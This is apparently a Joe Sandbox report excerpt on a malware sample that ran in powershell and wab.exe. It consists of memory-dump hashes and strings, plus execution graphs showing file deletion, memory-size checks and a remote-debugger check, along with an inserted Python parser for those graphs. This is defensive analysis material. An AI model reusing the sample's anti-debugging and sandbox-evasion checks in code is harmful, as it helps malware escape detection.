                                                                              • Instruction Fuzzy Hash: 8F919F34A012489FCB14DFA9D844AAEBBF2FF89315F1485ADE4459B361CB35EC86CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 66dea43af468ee859be22e7c3acc7c75ff8fc4527a9837543027bfb4ee08f9f9
                                                                              • Instruction ID: 6470e860bc08b2592e95106460c8ce5e7a3a7c49e05d73437af27447780e1222
                                                                              • Opcode Fuzzy Hash: 66dea43af468ee859be22e7c3acc7c75ff8fc4527a9837543027bfb4ee08f9f9
                                                                              • Instruction Fuzzy Hash: CC712970E002089FCB14EFA5D484BADBBF6BF88305F15856DE416AB794DB30AD46CB41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 977677cb4eb69a24c0c7e6cc3a4fa115f0b25c43ebf411731f81ac27dbed342b
                                                                              • Instruction ID: faf8460b1136ee06fbe4e151db00c61c010ac41859f28872422582b228b138a9
                                                                              • Opcode Fuzzy Hash: 977677cb4eb69a24c0c7e6cc3a4fa115f0b25c43ebf411731f81ac27dbed342b
                                                                              • Instruction Fuzzy Hash: F6614B34A00649CFCB14DFA5D544AADBBF2BF88301F258558E402AF765DB74AD89CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c31272ce8d0efd3119e0623cbd3dc48c15582443ecde543e240bb2a2b1a9d599
                                                                              • Instruction ID: e704abdfce18504671a1680096c2cfe59699a4ff1d5dec719deda04f1e4c1640
                                                                              • Opcode Fuzzy Hash: c31272ce8d0efd3119e0623cbd3dc48c15582443ecde543e240bb2a2b1a9d599
                                                                              • Instruction Fuzzy Hash: B6612B34E00649CFCB14DFA5C554A9DBBB2FF88301F158558E402AF369DB74AD89CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31736fec1acf173bd76360c79688e184059ffa7feababb3fe47630b45e050997
                                                                              • Instruction ID: 38aefc805b5e3af60a93f4cb186353c0db9955949fdd218211b4648fa9b1c78f
                                                                              • Opcode Fuzzy Hash: 31736fec1acf173bd76360c79688e184059ffa7feababb3fe47630b45e050997

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq$tl$tl
                                                                              • API String ID: 0-2584504867
                                                                              • Opcode ID: b420f1c91202d8d65a69512f609cdd099813ab3b412e3c70f3346fef42729310
                                                                              • Instruction ID: f0378452481483cb66fab9b27b35183f725f1e81dc23fa092166b2e490da41dd
                                                                              • Opcode Fuzzy Hash: b420f1c91202d8d65a69512f609cdd099813ab3b412e3c70f3346fef42729310
                                                                              • Instruction Fuzzy Hash: 01A13AB270424A8FE7359A7998017A7BBE6BFC6220F14816BD60DCB791DE31CC41C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq
                                                                              • API String ID: 0-3031240953
                                                                              • Opcode ID: e246c8cb6f12c2986bcdd7f7d8745508a6c09c48c89c1ec4dac5bc99fea1ce11
                                                                              • Instruction ID: 5174afb9521fcbc4dbee1c8dd1689e97deb861fd5a26b7123819b56bee7858a2
                                                                              • Opcode Fuzzy Hash: e246c8cb6f12c2986bcdd7f7d8745508a6c09c48c89c1ec4dac5bc99fea1ce11
                                                                              • Instruction Fuzzy Hash: E3A148B1B041499FEB359BA9D4006EABBA2EBC5310F14C16ADA098FB42DF31DD51C7D1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$84|l$XRyq$XRyq$XRyq$tPtq$tPtq$$tq
                                                                              • API String ID: 0-191154098
                                                                              • Opcode ID: 0d3927c77e06c246f07415471ee4d41b2db6fa4e46cf4346df15a935cf0fbe49
                                                                              • Instruction ID: d752d5a75a3852a66a87fc5255f7b8d303034d750ef532557097267349ebb769
                                                                              • Opcode Fuzzy Hash: 0d3927c77e06c246f07415471ee4d41b2db6fa4e46cf4346df15a935cf0fbe49
                                                                              • Instruction Fuzzy Hash: BA612BF17141169FEB349B698440AEAFBB2AF89314F14C06ADA099FB51CB31DD41CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-2242134050
                                                                              • Opcode ID: bb56d60cfebcd7f68ff6e1ba3e898881631babfc0764a8f60fc6ee256c84eaee
                                                                              • Instruction ID: ffa05abb4455a560efa9d86412b1444ba4a99b6ffa3611336ead44e911003029
                                                                              • Opcode Fuzzy Hash: bb56d60cfebcd7f68ff6e1ba3e898881631babfc0764a8f60fc6ee256c84eaee
                                                                              • Instruction Fuzzy Hash: 63C191B1B10209DBEB24DF98C541BEEBBB2AF89314F148519D6096FB55CB32EC42CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$84|l$tPtq$tPtq$$tq
                                                                              • API String ID: 0-2998347628
                                                                              • Opcode ID: 2de8c437fb6d4a0d2bde190a4fde2a096b6dd5e89282fdf807ec8c549d3e8250
                                                                              • Instruction ID: ab6dfaae2d6088cbf6dbc1c698889fa62e0a52f1c8f68f33730d2b54b427e76f
                                                                              • Opcode Fuzzy Hash: 2de8c437fb6d4a0d2bde190a4fde2a096b6dd5e89282fdf807ec8c549d3e8250
                                                                              • Instruction Fuzzy Hash: A96108B1705106DFEB349BA9C4506EAFBA2AF89311F14C099EA099F751CB31DD41CBB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$tPtq$$tq$$tq$$tq
                                                                              • API String ID: 0-2731490204
                                                                              • Opcode ID: 1c1da070d36cd9c074355ce76865fc62b9a54d40a8b106ed5653f5834b317fe7
                                                                              • Instruction ID: 4f08e59b5ab7318442fb3038eb59738cc18910ab326c32976b7b3b5cb61daabe
                                                                              • Opcode Fuzzy Hash: 1c1da070d36cd9c074355ce76865fc62b9a54d40a8b106ed5653f5834b317fe7
                                                                              • Instruction Fuzzy Hash: A24104F1A04286EBFB348F55C540BE5B7B1AB85320F5481AAEA1D9BE93C731D840CB55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq$$tq
                                                                              • API String ID: 0-2409360608
                                                                              • Opcode ID: c201bb4d589036bdf3ade62e833994236ffc3df6ae531a7129f33ae9fce1879e
                                                                              • Instruction ID: 1f56ff7395b476ce3a2b4f81dcad0a2d3c3f29786aa4ac73005769c6827b7761
                                                                              • Opcode Fuzzy Hash: c201bb4d589036bdf3ade62e833994236ffc3df6ae531a7129f33ae9fce1879e
                                                                              • Instruction Fuzzy Hash: 8F317BF270821A8FEF354A6B58802F6F795AF89110B24606BDA0ACB945DF31C851C371
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq$$tq
                                                                              • API String ID: 0-2409360608
                                                                              • Opcode ID: 46bef03841617b9141b4828aebdb3e635249a9bf01b319f363adc37b254e5e5a
                                                                              • Instruction ID: e61ad8ea8b3fc09e4c0b07c2306ac7ff8fe4b102fe83f9769ca65434ed5b0d83
                                                                              • Opcode Fuzzy Hash: 46bef03841617b9141b4828aebdb3e635249a9bf01b319f363adc37b254e5e5a
                                                                              • Instruction Fuzzy Hash: 3E315CF2709206CFEF354A6598111F6F7A1EBC1261B24406FDA0D8BA46DF31D851C752
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq$$tq$$tq$tl$tl
                                                                              • API String ID: 0-517773585
                                                                              • Opcode ID: 87a9a0c0baa6746528d6b993f4161737ccee22fca6a99326d19e232bd0bb8599
                                                                              • Instruction ID: d61e4721065ffb7d966f48936dd0c635b4b138f33dc4dc45433526a28f0c46b0
                                                                              • Opcode Fuzzy Hash: 87a9a0c0baa6746528d6b993f4161737ccee22fca6a99326d19e232bd0bb8599
                                                                              • Instruction Fuzzy Hash: 47110BB930420A9BFB3C556E9800BA7F79AFBC1761F24C02AE64D87B51EA31C941C751
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (otq$(otq$(otq$(otq
                                                                              • API String ID: 0-2682020920
                                                                              • Opcode ID: 5c27897011f948c06c5a5b02d3badb2e8bc2b37850b7d3087c536ae3a04825ca
                                                                              • Instruction ID: 3e71095801b846a4263d9c8f84b24f926c69be8a3e7cf5294c8181152b2053ed
                                                                              • Opcode Fuzzy Hash: 5c27897011f948c06c5a5b02d3badb2e8bc2b37850b7d3087c536ae3a04825ca
                                                                              • Instruction Fuzzy Hash: B8F116F1704249CFEB358F69C840BAAFBA6EF85310F14846AE6498F691DF35D841CB61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq
                                                                              • API String ID: 0-3196592860
                                                                              • Opcode ID: ae12f65dedcbae8559f98683b260e9fa001afe00f257db60e821153d951add17
                                                                              • Instruction ID: 3cbd153a63a20a04bfebcf9966dc62918c656b343b357cd64beebc41d90dbee6
                                                                              • Opcode Fuzzy Hash: ae12f65dedcbae8559f98683b260e9fa001afe00f257db60e821153d951add17
                                                                              • Instruction Fuzzy Hash: 72D109B172824ADFEB359F69C4006EABBB2AF86311F24C06AD64DCFA51D731C941C791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l
                                                                              • API String ID: 0-538009330
                                                                              • Opcode ID: 1c05f3f4388ec66f050fdc59832bb9960fb1e418e55324a3c03dcc3c5663c163
                                                                              • Instruction ID: c3fc9961cdb9b973832ae0b0eb10492a1fefe7a94eb7f16a50c251c5ecbc1eb2
                                                                              • Opcode Fuzzy Hash: 1c05f3f4388ec66f050fdc59832bb9960fb1e418e55324a3c03dcc3c5663c163
                                                                              • Instruction Fuzzy Hash: 24B171B1A01605DBEB34CF94C590BAAF7B2BF89721F14851EDB4A6BB44C731B841CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l
                                                                              • API String ID: 0-538009330
                                                                              • Opcode ID: 82534a9efdcc035e7c7985181035a344839d1273034ac30bd78f73589045f5f1
                                                                              • Instruction ID: 9010c1a1577bb4d7565cfeda22064234455a59d2694f0d0ff419b1f4b49c6da2
                                                                              • Opcode Fuzzy Hash: 82534a9efdcc035e7c7985181035a344839d1273034ac30bd78f73589045f5f1
                                                                              • Instruction Fuzzy Hash: D77184B0E00509DFEB64CFA8C550AAABBB3AF88314F14C169D9096FB54DB32DD41CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,S~l$,S~l$p5nk$xS~l
                                                                              • API String ID: 0-3704198172
                                                                              • Opcode ID: 2699a7276c7a703ba81c911d8c1f222ad774184d8121c5c24a0349e829ad43ab
                                                                              • Instruction ID: bf1c5366853aedca27d2d3571f6a0c334f0b61a81531e01c518957ccbd2282c8
                                                                              • Opcode Fuzzy Hash: 2699a7276c7a703ba81c911d8c1f222ad774184d8121c5c24a0349e829ad43ab
                                                                              • Instruction Fuzzy Hash: 154129F1B042199FD7319B7988017A7BBA5AF85310F1481BAE609DBF51DA35C881C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq$$tq$$tq$$tq
                                                                              • API String ID: 0-173548568
                                                                              • Opcode ID: 95b1662b36602d026e2873e663052da87db904886854c1ed47228de990468140
                                                                              • Instruction ID: 3fcf310420b847dbdc6dc10c7d00f8bfb8cd46f17be7317bed74e58b205e7f41
                                                                              • Opcode Fuzzy Hash: 95b1662b36602d026e2873e663052da87db904886854c1ed47228de990468140
                                                                              • Instruction Fuzzy Hash: 20317DB23143065BF634157A4811B7BB69F8BC4714F24442ADA0ADF791DE35CD518360
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$84|l$tPtq$tPtq
                                                                              • API String ID: 0-1642240501
                                                                              • Opcode ID: a86fa19422072c8c6a8a5f965b2f8caa8099f3055d7a60c9a819aa349d6193c0
                                                                              • Instruction ID: 14963f4225c0ce40ea0e95f2e01bb2ca64ea0f143d1d5da8ee6c29eafa3fa5dc
                                                                              • Opcode Fuzzy Hash: a86fa19422072c8c6a8a5f965b2f8caa8099f3055d7a60c9a819aa349d6193c0
                                                                              • Instruction Fuzzy Hash: 5B314DF1B042659FC7215B689811ABAFFB2EF86310F14815ADA49AF792C730CD01C7E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq$$tq$$tq$$tq
                                                                              • API String ID: 0-173548568
                                                                              • Opcode ID: 866f58d16e8678684e2af56725d30a4ae7b1026e75f02ee3963efac759ae9a19
                                                                              • Instruction ID: 8edec1c9043aa7b535079f299f1c3b83c9019d1f736c5dfd4f143c818e215168
                                                                              • Opcode Fuzzy Hash: 866f58d16e8678684e2af56725d30a4ae7b1026e75f02ee3963efac759ae9a19
                                                                              • Instruction Fuzzy Hash: B5216BF33142065BFB3C197E9800767B7AA9BC0311F64812E9A4DCB7C1DE75D8418361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$84|l$W$tPtq
                                                                              • API String ID: 0-3442102116
                                                                              • Opcode ID: 7e0f3e257772bd46a13e6baf0d216f12598fa2db57a559b3e5eb4f5d9a373075
                                                                              • Instruction ID: fb2daada3e0e594f456a1dae0b19d1cee3183b810b17133400d8836f39482d11
                                                                              • Opcode Fuzzy Hash: 7e0f3e257772bd46a13e6baf0d216f12598fa2db57a559b3e5eb4f5d9a373075
                                                                              • Instruction Fuzzy Hash: D931D1F0A05246CFEB35CF548984BA6FBA1AB85314F18809BD6095FA52DB31DC40C7A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq
                                                                              • API String ID: 0-3085001694
                                                                              • Opcode ID: 32d72a35143987437f4880665a3bcf45699395ad54b40b30702950597e648509
                                                                              • Instruction ID: f8d5ec616a061ff44fc9cec986d4b749fd395900d72fb0c12a7e2e6f14af846e
                                                                              • Opcode Fuzzy Hash: 32d72a35143987437f4880665a3bcf45699395ad54b40b30702950597e648509
                                                                              • Instruction Fuzzy Hash: 1801D05170C35D4FD377027818316E6AF769FC761072901E7C546DF652C9544D5183E7
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:15.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:12
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 5112 2578440 5113 2578486 DeleteFileW 5112->5113 5115 25784bf 5113->5115 5116 257f480 5117 257f4b5 5116->5117 5118 257f48d 5116->5118 5121 257f558 5117->5121 5122 257f59e GlobalMemoryStatusEx 5121->5122 5123 257f4d2 5122->5123 5124 25770b8 5125 25770fc CheckRemoteDebuggerPresent 5124->5125 5126 257713e 5125->5126

                                                                              Control-flow Graph

                                                                              control_flow_graph 73 25770b8-257713c CheckRemoteDebuggerPresent 75 2577145-2577180 73->75 76 257713e-2577144 73->76 76->75
                                                                              APIs
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0257712F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: CheckDebuggerPresentRemote
                                                                              • String ID: |l
                                                                              • API String ID: 3662101638-2063047074
                                                                              • Opcode ID: df8acd8a8990f24d0c7fad7f163fc9689cc3a2bb5f53886076fb9bcb934779f4
                                                                              • Instruction ID: 0ea1c578fee65a2df075cc70f5ab9999507b7b42039ef75d1c7d26d14890d3f8
                                                                              • Opcode Fuzzy Hash: df8acd8a8990f24d0c7fad7f163fc9689cc3a2bb5f53886076fb9bcb934779f4
                                                                              • Instruction Fuzzy Hash: 032128B1D002598FDB10CF9AD844BEEFBF4EF49320F14845AE459A7250D778A944CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%
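The `execution_graph` and `control_flow_graph` lines above are the report's graph renderings flattened into one token stream: a node id followed by an address (or a basic-block range), bare words that are the APIs called in that node, and `src->dst` edges. The parser below is an added example, not part of the Joe Sandbox report or its plugin; the grammar is inferred from the lines on this page (an assumption), the `callgraph` form with `Function_...` nodes is deliberately not handled, and the sample input is the report's own edge lists for the wab.exe dump at 0x02570000. It recovers, per root function, the API sequence reached along each path, which is the quickest way to see that 25770b8 exists only to call CheckRemoteDebuggerPresent and 257f480 only to call GlobalMemoryStatusEx.

```python
"""Parse the flattened execution_graph / control_flow_graph edge lists that
Joe Sandbox emits and recover which APIs each root function reaches."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Edge lists copied from this report (process 9, the wab.exe dump at
# 0x02570000). Page data, not constructed.
EXECUTION_GRAPH = (
    "execution_graph 5112 2578440 5113 2578486 DeleteFileW 5112->5113 "
    "5115 25784bf 5113->5115 5116 257f480 5117 257f4b5 5116->5117 "
    "5118 257f48d 5116->5118 5121 257f558 5117->5121 "
    "5122 257f59e GlobalMemoryStatusEx 5121->5122 5123 257f4d2 5122->5123 "
    "5124 25770b8 5125 25770fc CheckRemoteDebuggerPresent 5124->5125 "
    "5126 257713e 5125->5126"
)
CONTROL_FLOW_GRAPH = (
    "control_flow_graph 79 2578440-257848a 81 2578492-25784bd DeleteFileW "
    "79->81 82 257848c-257848f 79->82 83 25784c6-25784ee 81->83 "
    "84 25784bf-25784c5 81->84 82->81 84->83"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_NODE_ID = re.compile(r"^\d+$")
# Addresses are lowercase hex; control-flow graphs use basic-block ranges.
_ADDR = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")


class Graph:
    def __init__(self) -> None:
        self.addr: Dict[int, str] = {}                         # node id -> address/range
        self.labels: Dict[int, List[str]] = defaultdict(list)  # node id -> API labels
        self.succ: Dict[int, List[int]] = defaultdict(list)
        self.indegree: Dict[int, int] = defaultdict(int)


def parse_graph(text: str) -> Graph:
    """Grammar inferred from the report (assumption): '<id> <addr>' starts a node,
    bare words after it are that node's API labels, '<a>-><b>' is an edge."""
    tokens = text.split()
    if tokens[0] not in ("execution_graph", "control_flow_graph"):
        raise ValueError(f"unsupported graph kind: {tokens[0]}")
    g, cur, i = Graph(), None, 1
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        m = _EDGE.match(tok)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            g.succ[src].append(dst)
            g.indegree[dst] += 1
            i += 1
        elif _NODE_ID.match(tok) and nxt and _ADDR.match(nxt):
            cur = int(tok)
            g.addr[cur] = nxt
            i += 2
        elif cur is None:
            raise ValueError(f"label {tok!r} before any node")
        elif tok == "call" and nxt:                        # "call 6237f0" (CFG form)
            g.labels[cur].append(f"call {nxt}")
            i += 2
        elif tok == "*" and nxt and _NODE_ID.match(nxt) and g.labels[cur]:
            g.labels[cur][-1] += f" x{nxt}"               # "memset * 2"
            i += 2
        elif _NODE_ID.match(tok) and tokens[i + 1:i + 3] == ["API", "calls"]:
            g.labels[cur].append(f"{tok} API calls")      # "4 API calls" summary node
            i += 3
        else:
            g.labels[cur].append(tok)
            i += 1
    return g


def api_chains(g: Graph) -> Dict[str, List[Tuple[str, ...]]]:
    """For each root (node without incoming edges) return the distinct API
    sequences met along simple paths out of it, keyed by the root's address."""
    out: Dict[str, List[Tuple[str, ...]]] = {}
    for root in (n for n in g.addr if g.indegree[n] == 0):
        chains = set()

        def walk(node: int, acc: Tuple[str, ...], on_path: frozenset) -> None:
            acc = acc + tuple(g.labels.get(node, ()))
            nexts = [s for s in g.succ.get(node, []) if s not in on_path]
            if not nexts:
                chains.add(acc)
                return
            for s in nexts:
                walk(s, acc, on_path | {s})

        walk(root, (), frozenset({root}))
        out[g.addr[root]] = sorted(chains)
    return out


def apis_used(g: Graph) -> List[str]:
    """Sorted, de-duplicated API names, ignoring 'call <addr>' and 'N API calls'."""
    names = {l for ls in g.labels.values() for l in ls
             if not l.startswith("call ") and not l.endswith("API calls")}
    return sorted(names)


if __name__ == "__main__":
    for name, text in (("execution graph", EXECUTION_GRAPH),
                       ("control-flow graph", CONTROL_FLOW_GRAPH)):
        g = parse_graph(text)
        print(f"{name}: APIs {apis_used(g)}")
        for addr, chains in api_chains(g).items():
            print(f"  root {addr}: {[' -> '.join(c) or '(no API)' for c in chains]}")
```

Back edges such as `653->651` in the larger wab.exe graph further down (a Sleep loop) are handled by tracking the nodes already on the current path, so the walk terminates on cyclic graphs.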

                                                                              Control-flow Graph

                                                                              control_flow_graph 66 25770b0-257713c CheckRemoteDebuggerPresent 69 2577145-2577180 66->69 70 257713e-2577144 66->70 70->69
                                                                              APIs
                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0257712F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.2939947803.0000000002570000.00000040.00000800.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_2570000_wab.jbxd
                                                                              Similarity
                                                                              • API ID: CheckDebuggerPresentRemote
                                                                              • String ID: |l
                                                                              • API String ID: 3662101638-2063047074
                                                                              • Opcode ID: 77420264bba4fa9bcf584cb563ce2c0cf8eb7026dd7b4a113e29fa059a06b244
